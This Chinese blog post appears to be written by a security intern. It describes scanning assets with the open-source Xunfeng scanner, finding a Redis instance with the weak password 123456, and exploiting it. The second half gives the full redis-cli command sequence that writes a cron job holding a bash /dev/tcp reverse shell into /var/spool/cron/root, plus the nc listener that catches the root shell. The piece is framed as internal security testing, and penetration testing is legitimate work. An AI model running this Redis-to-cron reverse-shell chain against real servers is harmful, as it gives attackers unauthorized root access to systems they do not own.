从巡风到redis弱口令反弹shell

刚到甲方实习,从不甲方内部部署一些安全平台发现了一些问题,开源的巡风在自动化扫描过程中展现的颇为出色、关于巡风的过多使用部署方法本文不做详细的讲解。
巡风扫描系统试用体验报告:http://www.freebuf.com/sectool/124365.html
github地址如下:https://github.com/ysrc/xunfeng
使用方法的视频演示:https://sec-pic-ly.b0.upaiyun.com/xunfeng/xunfeng.mp4
我本地用docker跑了一个,在弱口令中导入了一些甲方常用的字典,效果发现还是非常不错的。
《从巡风到redis弱口令反弹shell》
在配置好资产范围和周期后,对masscan路径线程进行配置,很快我就到了不少的结果。用语法筛选6379端口的服务
《从巡风到redis弱口令反弹shell》 选中结果后对redis进行弱口令任务筛选或者未授权访问 《从巡风到redis弱口令反弹shell》 得到一个redis弱口令。密码123456 《从巡风到redis弱口令反弹shell》 操刀上kali,直接通过弱口令获取目标系统root权限。 通过cron反弹shell,本地NC监听成功返回shell root权限 《从巡风到redis弱口令反弹shell》
 root@kali-Cotton:~# redis-cli -h 192.168.128.84 -a 123456 192.168.128.84:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.135.100/7999 0>&1\n" OK 192.168.128.84:6379> config set dir /var/spool/cron/ OK 192.168.128.84:6379> config set dbfilename root OK 192.168.128.84:6379> save 
《从巡风到redis弱口令反弹shell》
root@kali-Cotton:~# nc -lvnp 7999
点赞